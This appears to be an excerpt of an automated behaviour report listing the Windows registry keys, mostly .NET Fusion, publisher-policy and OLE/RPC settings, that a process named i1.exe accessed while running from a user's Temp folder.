HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6418cf\6185f1ae
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|i1.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|i1.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|i1.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.0.0.d3.resources_it-IT_96cbd02afd56cf46
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\afbae67\87e05e7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.0.0.d3.resources_it_96cbd02afd56cf46
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\afbae67\41529c91
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.0.0.{863ebd4e-255d-4ff1-a8f5-de1c8e0b21db}__3e56350693f7355e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\433351e7\2db83a0b
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\i1.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\B21A317C
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
